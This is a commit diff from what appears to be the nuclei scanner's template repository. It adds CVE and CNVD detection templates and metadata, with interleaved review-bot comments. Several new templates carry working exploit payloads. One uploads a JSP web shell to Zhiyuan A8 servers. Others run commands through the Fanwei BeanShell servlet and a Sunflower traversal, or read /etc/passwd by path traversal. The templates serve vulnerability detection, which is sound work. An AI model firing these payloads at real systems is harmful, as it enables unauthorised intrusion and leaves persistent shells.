Merge remote-tracking branch 'upstream/master'

patch-1
GwanYeong Kim 2022-03-04 10:02:02 +09:00
commit 6cc02540e4
144 changed files with 1548 additions and 3360 deletions



@ -13,3 +13,6 @@ tags:
# files is a list of files to ignore template execution
# unless asked for by the user.
files:
- cves/2020/CVE-2020-35489.yaml


@ -3,9 +3,17 @@ id: CNVD-2019-06255
info:
name: CatfishCMS RCE
author: Lark-Lab
severity: medium
reference: http://112.124.31.29/%E6%BC%8F%E6%B4%9E%E5%BA%93/01-CMS%E6%BC%8F%E6%B4%9E/CatfishCMS/CNVD-2019-06255%20CatfishCMS%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C/
severity: critical
description: CatfishCMS 4.8.54 contains a remote command execution vulnerability in the "method" parameter.
remediation: Upgrade to CatfishCMS version 4.8.54 or later.
reference:
- https://its401.com/article/yun2diao/91344725
- https://github.com/xwlrbh/Catfish/issues/4
tags: rce,cnvd,catfishcms,cnvd2019
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10.0
cwe-id: CWE-77
requests:
- method: GET
@ -25,3 +33,5 @@ requests:
- 'SHELL'
- 'USER'
condition: and
# Enhanced by cs on 2022/02/28
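Review bot: The new `description` and `remediation` lines contradict each other: the description says CatfishCMS 4.8.54 contains the command execution flaw, while the remediation tells the reader to upgrade to 4.8.54 or later, so it is impossible to tell whether 4.8.54 is the vulnerable or the fixed release. One of the two version strings is presumably wrong; check the referenced advisories and state the affected range and the first fixed version separately, e.g. `description: CatfishCMS <AFFECTED-VERSIONS> contains a remote command execution vulnerability in the "method" parameter.` with `remediation: Upgrade to CatfishCMS version <FIXED-VERSION> or later.` The severity bump to critical is consistent with the added CVSS 10.0 score. The requests section continues outside the hunk.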


@ -0,0 +1,47 @@
id: CNVD-2019-19299
info:
name: Zhiyuan A8 Arbitrary File Writing to Remote Code Execution
author: daffainfo
severity: critical
reference:
- https://www.cxyzjd.com/article/guangying177/110177339
- https://github.com/sectestt/CNVD-2019-19299
tags: zhiyuan,cnvd,cnvd2019,rce
requests:
- raw:
- |
POST /seeyon/htmlofficeservlet HTTP/1.1
Host: {{Hostname}}
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q =0.8,application/signed-exchange;v=b3
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close
DBSTEP V3. 0 343 0 658 DBSTEP=OKMLlKlV
OPTION=S3WYOSWLBSGr
currentUserId=zUCTwigsziCAPLesw4gsw4oEwV66
= WUghPB3szB3Xwg66 the CREATEDATE
recordID = qLSGw4SXzLeGw4V3wUw3zUoXwid6
originalFileId = wV66
originalCreateDate = wUghPB3szB3Xwg66
FILENAME = qfTdqfTdqfTdVaxJeAJQBRl3dExQyYOdNAlfeaxsdGhiyYlTcATdb4o5nHzs
needReadFile = yRWZdAS6
originalCreateDate IZ = 66 = = wLSGP4oEzLKAz4
<%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%><%!public static String excuteCmd(String c) {StringBuilder line = new StringBuilder ();try {Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));String temp = null;while ((temp = buf.readLine( )) != null) {line.append(temp+"\n");}buf.close();} catch (Exception e) {line.append(e.getMessage());}return line.toString() ;} %><%if("x".equals(request.getParameter("pwd"))&&!"".equals(request.getParameter("{{randstr}}"))){out.println("<pre>" +excuteCmd(request.getParameter("{{randstr}}")) + "</pre>");}else{out.println(":-)");}%>6e4f045d4b8506bf492ada7e3390d7ce
- |
GET /seeyon/test123456.jsp?pwd=asasd3344&{{randstr}}=ipconfig HTTP/1.1
Host: {{Hostname}}
req-condition: true
matchers:
- type: dsl
dsl:
- 'status_code_2 == 200'
- 'contains(body_1, "htmoffice operate")'
- 'contains(body_2, "Windows IP")'
condition: and
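Review bot: The info block does not document that this template writes to the target: the first raw request uploads a JSP (`FILENAME = ...`) that the second request then fetches as `/seeyon/test123456.jsp`, and nothing in the template removes it, so every scan leaves a persistent file under a fixed name on a vulnerable host. Add a `description` that says so and a `remediation` entry, and consider a comment above the first `- |` such as `# NOTE: this check uploads a JSP file that is not cleaned up; see description`. The `contains(body_2, "Windows IP")` matcher also only fires on Windows hosts, so a vulnerable Linux instance is reported as not vulnerable; if that is intended, the description should say the check is Windows-only.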


@ -0,0 +1,23 @@
id: CNVD-2019-32204
info:
name: Fanwei e-cology <= 9.0 Remote Code Execution
author: daffainfo
severity: critical
description: The attacker can directly execute arbitrary commands on the target server by invoking the unauthorized access problem interface in the BeanShell component. Currently, the security patch for this vulnerability has been released. Please take protective measures as soon as possible for users who use the Fanwei e-cology OA system.
reference: https://blog.actorsfit.com/a?ID=01500-11a2f7e6-54b0-4a40-9a79-5c56dc6ebd51
tags: fanwei,cnvd,cnvd2019,rce
requests:
- raw:
- |
POST /bsh.servlet.BshServlet HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
bsh.script=exec("cat+/etc/passwd");&bsh.servlet.output=raw
matchers:
- type: regex
regex:
- "root:.*:0:0:"
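Review bot: The `description` mixes the vulnerability statement with vendor advisory text ("Currently, the security patch ... Please take protective measures ..."), which belongs under `remediation`, and the template has no `classification` block although the other new templates in this commit carry one. Suggest trimming the description to its first sentence and adding `remediation: Apply the vendor security patch for the BeanShell component.` with the patched version if the referenced write-up gives one. The template is complete within this hunk.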


@ -2,10 +2,18 @@ id: CNVD-2021-49104
info:
name: Pan Micro E-office File Uploads
description: The Pan Wei Micro E-office version running allows arbitrary file uploads from a remote attacker.
remediation: Pan Wei has released an update to resolve this vulnerability.
author: pikpikcu
severity: critical
reference: https://chowdera.com/2021/12/202112200602130067.html
reference:
- https://chowdera.com/2021/12/202112200602130067.html
- http://v10.e-office.cn
tags: pan,micro,cnvd,cnvd2021
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:L
cvss-score: 9.9
cwe-id: CWE-434
requests:
- raw:
@ -36,3 +44,5 @@ requests:
- type: status
status:
- 200
# Enhanced by cs on 2022/02/28
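Review bot: The new `description` line reads oddly ("The Pan Wei Micro E-office version running allows arbitrary file uploads") and uses a different product name from the `name` field ("Pan Micro E-office"), and the `remediation` line names no version. Suggest `description: Pan Micro (Pan Wei) E-office allows arbitrary file uploads from a remote attacker.` and, if the referenced advisory states the fixed release, `remediation: Upgrade to Pan Micro E-office <FIXED-VERSION> or later.` The added reference `http://v10.e-office.cn` looks like a product page rather than an advisory; confirm it is meant as a reference. The requests section continues outside the hunk.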


@ -0,0 +1,42 @@
id: CNVD-2022-03672
info:
name: Sunflower Simple and Personal edition RCE
author: daffainfo
severity: critical
reference:
- https://www.1024sou.com/article/741374.html
- https://copyfuture.com/blogs-details/202202192249158884
- https://www.cnvd.org.cn/flaw/show/CNVD-2022-10270
- https://www.cnvd.org.cn/flaw/show/CNVD-2022-03672
tags: cnvd,cnvd2020,sunflower,rce
requests:
- raw:
- |
POST /cgi-bin/rpc HTTP/1.1
Host: {{Hostname}}
action=verify-haras
- |
GET /check?cmd=ping../../../windows/system32/windowspowershell/v1.0/powershell.exe+ipconfig HTTP/1.1
Host: {{Hostname}}
Cookie: CID={{cid}}
extractors:
- type: regex
name: cid
internal: true
group: 1
regex:
- '"verify_string":"(.*)"'
req-condition: true
matchers:
- type: dsl
dsl:
- "status_code_1==200"
- "status_code_2==200"
- "contains(body_1, 'verify_string')"
- "contains(body_2, 'Windows IP')"
condition: and
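Review bot: The `tags` line says `cnvd2020` but the template id is CNVD-2022-03672, so year-based tag filtering misfiles this template; it should read `tags: cnvd,cnvd2022,sunflower,rce`. The reference list also contains CNVD-2022-10270, a different advisory id, which is fine if it is a related entry but deserves a comment. The template has no `description`, and as in CNVD-2019-19299 the `contains(body_2, 'Windows IP')` match only succeeds on Windows hosts, which is presumably intended given the Windows path in the request but should be stated.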


@ -35,5 +35,3 @@ requests:
- "text/html"
# Enhanced by mp on 2022/01/27
# Enhanced by mp on 2022/01/27


@ -1,10 +1,16 @@
id: axis2-default-login
id: CVE-2010-0219
info:
name: Axis2 Default Login
name: Apache Axis2 Default Login
author: pikpikcu
severity: high
tags: axis,apache,default-login,axis2
description: Apache Axis2, as used in dswsbobje.war in SAP BusinessObjects Enterprise XI 3.2, CA ARCserve D2D r15, and other products, has a default password of axis2 for the admin account, which makes it easier for remote attackers to execute arbitrary code by uploading a crafted web service.
tags: cve,cve2010,axis,apache,default-login,axis2
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2010-0219
- https://knowledge.broadcom.com/external/article/13994/vulnerability-axis2-default-administrato.html
classification:
cve-id: CVE-2010-0219
requests:
- raw:
@ -39,3 +45,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/03/02
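Review bot: The template id changes from `axis2-default-login` to `CVE-2010-0219`; anything that references the old id (workflows, id-based include or exclude filters, ignore lists such as the `files:` entries in this commit's .nuclei-ignore hunk) will silently stop matching, so the rename should be called out in the commit message or changelog. The `classification` block only carries `cve-id`, while the other CVE templates touched here add `cvss-metrics`, `cvss-score` and `cwe-id`; consider the same for consistency. The requests section continues outside the hunk.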


@ -5,10 +5,9 @@ info:
author: daffainfo
severity: high
description: A directory traversal vulnerability in the SmartSite (com_smartsite) component 1.0.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
remediation: Upgrade to a supported version.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2010-1657
- https://www.exploit-db.com/exploits/12428
- https://www.cvedetails.com/cve/CVE-2010-1657
tags: cve,cve2010,joomla,lfi
classification:
cve-id: CVE-2010-1657
@ -26,4 +25,4 @@ requests:
status:
- 200
# Enhanced by mp on 2022/02/15
# Enhanced by mp on 2022/02/27
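Review bot: The added `remediation: Upgrade to a supported version.` gives the reader nothing actionable: it names neither a fixed component version nor the fact that these are third-party Joomla! components rather than Joomla! core. If the referenced advisories give a fixed release, state it (`remediation: Upgrade to <COMPONENT> <FIXED-VERSION> or later.`); if none exists, say that the component should be removed or replaced. The same line is added to CVE-2010-1658, CVE-2010-1659, CVE-2010-1714, CVE-2010-1717, CVE-2010-1718, CVE-2010-1719, CVE-2010-1722 and CVE-2010-1723 in this commit. The info block of this template starts outside the hunk.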


@ -1,16 +1,17 @@
id: CVE-2010-1658
info:
name: Joomla! Component NoticeBoard 1.3 - Local File Inclusion
author: daffainfo
severity: high
description: A directory traversal vulnerability in the Code-Garage NoticeBoard (com_noticeboard) component 1.3 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.
remediation: Upgrade to a supported version.
reference:
- https://www.exploit-db.com/exploits/12427
- https://www.cvedetails.com/cve/CVE-2010-1658
tags: cve,cve2010,joomla,lfi
classification:
cve-id: CVE-2010-1658
requests:
- method: GET
path:
@ -23,4 +24,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/02/15
# Enhanced by mp on 2022/02/27


@ -1,16 +1,17 @@
id: CVE-2010-1659
info:
name: Joomla! Component Ultimate Portfolio 1.0 - Local File Inclusion
author: daffainfo
severity: high
description: A directory traversal vulnerability in the Ultimate Portfolio (com_ultimateportfolio) component 1.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
remediation: Upgrade to a supported version.
reference:
- https://www.exploit-db.com/exploits/12426
- https://www.cvedetails.com/cve/CVE-2010-1659
- https://nvd.nist.gov/vuln/detail/CVE-2010-1659
tags: cve,cve2010,joomla,lfi
classification:
cve-id: CVE-2010-1659
requests:
- method: GET
path:
@ -23,4 +24,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/02/15
# Enhanced by mp on 2022/02/28


@ -4,7 +4,6 @@ info:
author: daffainfo
severity: high
description: A directory traversal vulnerability in the Arcade Games (com_arcadegames) component 1.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
remediation: Upgrade to a supported version.
reference:
- https://www.exploit-db.com/exploits/12168
- https://www.cvedetails.com/cve/CVE-2010-1714
@ -23,4 +22,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/02/15
# Enhanced by mp on 2022/02/28


@ -1,16 +1,17 @@
id: CVE-2010-1717
info:
name: Joomla! Component iF surfALERT 1.2 - Local File Inclusion
author: daffainfo
severity: high
description: A directory traversal vulnerability in the iF surfALERT (com_if_surfalert) component 1.2 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.
remediation: Upgrade to a supported version.
reference:
- https://www.exploit-db.com/exploits/12291
- https://www.cvedetails.com/cve/CVE-2010-1717
tags: cve,cve2010,joomla,lfi
classification:
cve-id: CVE-2010-1717
requests:
- method: GET
path:
@ -23,4 +24,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/02/15
# Enhanced by mp on 2022/03/01


@ -1,16 +1,17 @@
id: CVE-2010-1718
info:
name: Joomla! Component Archery Scores 1.0.6 - Local File Inclusion
author: daffainfo
severity: high
description: A directory traversal vulnerability in archeryscores.php in the Archery Scores (com_archeryscores) component 1.0.6 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
remediation: Upgrade to a supported version.
reference:
- https://www.exploit-db.com/exploits/12282
- https://www.cvedetails.com/cve/CVE-2010-1718
tags: cve,cve2010,joomla,lfi
classification:
cve-id: CVE-2010-1718
requests:
- method: GET
path:
@ -23,4 +24,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/02/15
# Enhanced by mp on 2022/03/01


@ -1,16 +1,17 @@
id: CVE-2010-1719
info:
name: Joomla! Component MT Fire Eagle 1.2 - Local File Inclusion
author: daffainfo
severity: high
description: A directory traversal vulnerability in the MT Fire Eagle (com_mtfireeagle) component 1.2 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.
remediation: Upgrade to a supported version.
reference:
- https://www.exploit-db.com/exploits/12233
- https://www.cvedetails.com/cve/CVE-2010-1719
tags: cve,cve2010,joomla,lfi
classification:
cve-id: CVE-2010-1719
requests:
- method: GET
path:
@ -23,4 +24,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/02/15
# Enhanced by mp on 2022/03/01


@ -1,16 +1,17 @@
id: CVE-2010-1722
info:
name: Joomla! Component Online Market 2.x - Local File Inclusion
author: daffainfo
severity: high
description: A directory traversal vulnerability in the Online Market (com_market) component 2.x for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.
remediation: Upgrade to a supported version.
reference:
- https://www.exploit-db.com/exploits/12177
- https://www.cvedetails.com/cve/CVE-2010-1722
tags: cve,cve2010,joomla,lfi
classification:
cve-id: CVE-2010-1722
requests:
- method: GET
path:
@ -23,4 +24,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/02/15
# Enhanced by mp on 2022/03/01


@ -1,16 +1,17 @@
id: CVE-2010-1723
info:
name: Joomla! Component iNetLanka Contact Us Draw Root Map 1.1 - Local File Inclusion
author: daffainfo
severity: high
description: A directory traversal vulnerability in the iNetLanka Contact Us Draw Root Map (com_drawroot) component 1.1 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.
remediation: Upgrade to a supported version.
reference:
- https://www.exploit-db.com/exploits/12289
- https://www.cvedetails.com/cve/CVE-2010-1723
tags: cve,cve2010,joomla,lfi
classification:
cve-id: CVE-2010-1723
requests:
- method: GET
path:
@ -23,4 +24,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/02/15
# Enhanced by mp on 2022/03/01


@ -31,5 +31,3 @@ requests:
- 200
# Enhanced by mp on 2022/02/25
# Enhanced by mp on 2022/02/25


@ -1,11 +1,16 @@
id: CVE-2015-7297
info:
name: Joomla Core SQL Injection
author: princechaddha
severity: high
description: SQL injection vulnerability in Joomla 3.2 before 3.4.4 allows remote attackers to execute arbitrary SQL commands.
reference: http://developer.joomla.org/security-centre/628-20151001-core-sql-injection.html
description: A SQL injection vulnerability in Joomla 3.2 before 3.4.4 allows remote attackers to execute arbitrary SQL commands.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2015-7297
- http://developer.joomla.org/security-centre/628-20151001-core-sql-injection.html
tags: cve,cve2015,joomla,sqli
classification:
cve-id: CVE-2015-7297
requests:
- method: GET
@ -17,3 +22,5 @@ requests:
words:
- "cf79ae6addba60ad018347359bd144d2"
part: body
# Enhanced by mp on 2022/03/02
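Review bot: Unlike the other CVE templates in this commit, no `remediation` key is added here although the `description` already states the affected range ("Joomla 3.2 before 3.4.4"); add `remediation: Upgrade to Joomla <FIXED-VERSION> or later.` with the version given in the referenced Joomla security-centre advisory. `name: Joomla Core SQL Injection` is generic for a CMS with several core SQLi CVEs; carrying the affected range in the name would make scan output easier to triage. The requests section continues outside the hunk.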


@ -24,4 +24,4 @@ requests:
- type: regex
part: header
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1


@ -5,8 +5,11 @@ info:
author: dhiyaneshDk
severity: medium
tags: cve,cve2017,xss,telerik
description: Cross-site scripting (XSS) vulnerability in Telerik.ReportViewer.WebForms.dll in Telerik Reporting for ASP.NET WebForms Report Viewer control before R1 2017 SP2 (11.0.17.406) allows remote attackers to inject arbitrary web script or HTML via the bgColor parameter to Telerik.ReportViewer.axd.
reference: https://www.veracode.com/blog/secure-development/anatomy-cross-site-scripting-flaw-telerik-reporting-module
description: Cross-site scripting vulnerability in Telerik.ReportViewer.WebForms.dll in Telerik Reporting for ASP.NET WebForms Report Viewer control before R1 2017 SP2 (11.0.17.406) allows remote attackers to inject arbitrary web script or HTML via the bgColor parameter to Telerik.ReportViewer.axd.
remediation: Upgrade to application version 11.0.17.406 (2017 SP2) or later.
reference:
- https://www.veracode.com/blog/secure-development/anatomy-cross-site-scripting-flaw-telerik-reporting-module
- https://nvd.nist.gov/vuln/detail/CVE-2017-9140
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.10
@ -29,3 +32,5 @@ requests:
- '#000000"onload="prompt(1)'
- 'Telerik.ReportViewer.axd?name=Resources'
condition: and
# Enhanced by cs on 2022/02/28


@ -0,0 +1,30 @@
id: CVE-2018-16716
info:
name: NCBI ToolBox - Directory Traversal
author: 0x_Akoko
severity: high
description: A path traversal vulnerability exists in viewcgi.c in the 2.0.7 through 2.2.26 legacy versions of the NCBI ToolBox, which may result in reading of arbitrary files (i.e., significant information disclosure) or file deletion via the nph-viewgif.cgi query string.
reference:
- https://github.com/grymer/CVE/blob/master/CVE-2018-16716.md
- https://nvd.nist.gov/vuln/detail/CVE-2018-16716
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2018-16716
cwe-id: CWE-22
tags: cve,cve2018,ncbi,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/blast/nph-viewgif.cgi?../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
- type: status
status:
- 200
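Review bot: The body regex `root:[x*]:0:0` only accepts `x` or `*` in the password field and therefore misses `/etc/passwd` lines with other values there (for example `!`), whereas the sibling template CVE-2018-19365 added in the same commit uses `root:.*:0:0:` for the same purpose; align on one pattern, e.g. `- "root:.*:0:0:"`. Neither new template carries a `remediation` key even though this description names the affected range (2.0.7 through 2.2.26); add one if the referenced write-up gives a fixed release.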


@ -0,0 +1,31 @@
id: CVE-2018-19365
info:
name: Wowza Streaming Engine Manager Directory Traversal
author: 0x_Akoko
severity: high
description: The REST API in Wowza Streaming Engine 4.7.4.01 allows traversal of the directory structure and retrieval of a file via a remote, specifically crafted HTTP request
reference:
- https://blog.gdssecurity.com/labs/2019/2/11/wowza-streaming-engine-manager-directory-traversal-and-local.html
- https://www.cvedetails.com/cve/CVE-2018-19365
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2018-19365
cwe-id: CWE-22
tags: cve,cve2018,wowza,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/enginemanager/server/logs/download?logType=error&logName=../../../../../../../../etc/passwd&logSource=engine"
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- "root:.*:0:0:"
- type: status
status:
- 200


@ -22,6 +22,6 @@ requests:
matchers:
- type: word
part: interactsh_protocol # Confirms the HTTP Interaction
part: interactsh_protocol # Confirms the HTTP Interaction
words:
- "http"


@ -1,16 +1,10 @@
id: CVE-2020-13937
info:
name: Apache Kylin Unauth
name: Apache Kylin Exposed Configuration File
author: pikpikcu
severity: medium
description: |
Apache Kylin 2.0.0, 2.1.0, 2.2.0, 2.3.0, 2.3.1, 2.3.2, 2.4.0,
2.4.1, 2.5.0, 2.5.1, 2.5.2, 2.6.0, 2.6.1, 2.6.2, 2.6.3, 2.6.4,
2.6.5, 2.6.6, 3.0.0-alpha, 3.0.0-alpha2, 3.0.0-beta, 3.0.0, 3.0.1,
3.0.2, 3.1.0, 4.0.0-alpha has one restful api which exposed
Kylin's configuration information without any authentication,
so it is dangerous because some confidential information entries will be disclosed to everyone.
description: Apache Kylin 2.0.0, 2.1.0, 2.2.0, 2.3.0, 2.3.1, 2.3.2, 2.4.0, 2.4.1, 2.5.0, 2.5.1, 2.5.2, 2.6.0, 2.6.1, 2.6.2, 2.6.3, 2.6.4, 2.6.5, 2.6.6, 3.0.0-alpha, 3.0.0-alpha2, 3.0.0-beta, 3.0.0, 3.0.1, 3.0.2, 3.1.0, 4.0.0-alpha have one REST API which exposed Kylin's configuration information without authentication.
reference:
- https://kylin.apache.org/docs/release_notes.html
- https://s.tencent.com/research/bsafe/1156.html
@ -45,3 +39,5 @@ requests:
- kylin.metadata.url
condition: and
part: body
# Enhanced by cs on 2022/02/28


@ -9,6 +9,8 @@ info:
- https://jenkins.io/security/advisory/2020-01-15/#SECURITY-1683
- http://www.openwall.com/lists/oss-security/2020/01/15/1
- http://packetstormsecurity.com/files/155967/Jenkins-Gitlab-Hook-1.4.2-Cross-Site-Scripting.html
metadata:
shodan-query: http.title:"GitLab"
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.10
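Review bot: `shodan-query: http.title:"GitLab"` is a plain scalar containing both a colon and double quotes; it parses as a string today only because the colon is not followed by a space, so a later edit that adds a space turns the value into a nested mapping. Quoting makes the intent explicit: `shodan-query: 'http.title:"GitLab"'`. The same value is added to CVE-2020-26413, CVE-2021-22205 and CVE-2021-22214 in this commit.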


@ -9,12 +9,14 @@ info:
- https://gitlab.com/gitlab-org/gitlab/-/issues/244275
- https://gitlab.com/gitlab-org/cves/-/blob/master/2020/CVE-2020-26413.json
- https://nvd.nist.gov/vuln/detail/CVE-2020-26413
tags: cve,cve2020,gitlab,exposure,enum,graphql
metadata:
shodan-query: http.title:"GitLab"
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.30
cve-id: CVE-2020-26413
cwe-id: CWE-200
tags: cve,cve2020,gitlab,exposure,enum,graphql
requests:
- raw:


@ -8,12 +8,12 @@ info:
reference:
- https://www.exploit-db.com/exploits/49189
- https://nvd.nist.gov/vuln/detail/CVE-2020-28976
tags: cve,cve2020,ssrf,wordpress,wp-plugin,oast,blind
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.30
cve-id: CVE-2020-28976
cwe-id: CWE-918
tags: cve,cve2020,ssrf,wordpress,wp-plugin,oast
requests:
- method: GET
@ -27,4 +27,4 @@ requests:
- type: word
part: interactsh_protocol
words:
- "http"
- "http"


@ -0,0 +1,30 @@
id: CVE-2020-35234
info:
name: SMTP WP Plugin Directory Listing
author: PR3R00T
severity: high
description: The WordPress Easy WP SMTP Plugin has its log folder remotely accessible and its content available for access.
remediation: Upgrade to version 1.4.3 or newer and consider disabling debug logs.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2020-35234
- https://blog.nintechnet.com/wordpress-easy-wp-smtp-plugin-fixed-zero-day-vulnerability/
tags: cve,cve2020,wordpress,wp-plugin,smtp
classification:
cve-id: CVE-2020-35234
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/easy-wp-smtp/"
- "{{BaseURL}}/wp-content/plugins/wp-mail-smtp-pro/"
matchers:
- type: word
words:
- "debug"
- "log"
- "Index of"
condition: and
# Enhanced by cs on 2022/02/28
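Review bot: The second path, `/wp-content/plugins/wp-mail-smtp-pro/`, appears to belong to a different plugin (WP Mail SMTP Pro) from the Easy WP SMTP plugin that the `description` and CVE-2020-35234 cover, so a directory listing found there would be reported under the wrong CVE; either drop it or add a comment explaining why it is included. The word matcher has no accompanying status check; the other new templates in this commit pair their content match with `matchers-condition: and` and a `status: 200` matcher, which would reduce false positives from error pages that happen to contain "log" and "debug". The `remediation` names version 1.4.3 but the `description` gives no affected range; consider stating it there too.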


@ -43,6 +43,5 @@ requests:
part: interactsh_protocol # Confirms the HTTP Interaction
words:
- "http"
# Enhanced by cs on 2022/02/14
# Enhanced by cs on 2022/02/16


@ -13,6 +13,8 @@ info:
- https://security.humanativaspa.it/gitlab-ce-cve-2021-22205-in-the-wild/
- https://hackerone.com/reports/1154542
- https://nvd.nist.gov/vuln/detail/CVE-2021-22205
metadata:
shodan-query: http.title:"GitLab"
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
cvss-score: 9.90


@ -9,12 +9,14 @@ info:
- https://nvd.nist.gov/vuln/detail/CVE-2021-22214
- https://vin01.github.io/piptagole/gitlab/ssrf/security/2021/06/15/gitlab-ssrf.html
- https://docs.gitlab.com/ee/api/lint.html
tags: cve,cve2021,gitlab,ssrf,oast
metadata:
shodan-query: http.title:"GitLab"
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
cvss-score: 8.60
cve-id: CVE-2021-22214
cwe-id: CWE-918
tags: cve,cve2021,gitlab,ssrf,oast
requests:
- raw:


@ -8,12 +8,12 @@ info:
reference:
- https://wpscan.com/vulnerability/d2d60cf7-e4d3-42b6-8dfe-7809f87547bd
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-39316
tags: wordpress,cve2021,cve,lfi,wp-plugin
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.50
cve-id: CVE-2021-39316
cwe-id: CWE-22
tags: wordpress,cve2021,cve,lfi,wp-plugin,zoomsounds
requests:
- method: GET
@ -29,4 +29,4 @@ requests:
- type: status
status:
- 200
- 200


@ -2,12 +2,14 @@ id: CVE-2021-41653
info:
name: TP-Link - OS Command Injection
description: The PING function on the TP-Link TL-WR840N EU v5 router with firmware through TL-WR840N(EU)_V5_171211 is vulnerable to remote code execution via a crafted payload in an IP address input field.
description: The PING function on the TP-Link TL-WR840N EU v5 router with firmware through TL-WR840N(EU)_V5_171211 is vulnerable to remote code execution via a specially crafted payload in an IP address input field.
author: gy741
severity: critical
remediation: Upgrade the firmware to at least version "TL-WR840N(EU)_V5_211109".
reference:
- https://k4m1ll0.com/cve-2021-41653.html
- https://nvd.nist.gov/vuln/detail/CVE-2021-41653
- https://www.tp-link.com/us/press/security-advisory/
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.80
@ -43,6 +45,8 @@ requests:
matchers:
- type: word
part: interactsh_protocol # Confirms the HTTP Interaction
part: interactsh_protocol # Confirms the HTTP Interaction
words:
- "http"
# Enhanced by mp on 2022/02/27


@ -4,10 +4,12 @@ info:
name: Apache 2.4.49 - Path Traversal and Remote Code Execution
author: daffainfo
severity: high
description: A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49. An attacker could use a path traversal attack to map URLs to files outside the expected document root. If files outside of the document root are not protected by "require all denied" these requests can succeed. Additionally this flaw could leak the source of interpreted files like CGI scripts. This issue is known to be exploited in the wild. This issue only affects Apache 2.4.49 and not earlier versions.
description: A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49. An attacker could use a path traversal attack to map URLs to files outside the expected document root. If files outside of the document root are not protected by "require all denied" these requests can succeed. Additionally, this flaw could leak the source of interpreted files like CGI scripts. This issue is known to be exploited in the wild. This issue only affects Apache 2.4.49 and not earlier versions.
remediation: Update to Apache HTTP Server 2.4.50 or later.
reference:
- https://github.com/apache/httpd/commit/e150697086e70c552b2588f369f2d17815cb1782
- https://nvd.nist.gov/vuln/detail/CVE-2021-41773
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-41773
- https://twitter.com/ptswarm/status/1445376079548624899
- https://twitter.com/h4x0r_dz/status/1445401960371429381
- https://github.com/blasty/CVE-2021-41773
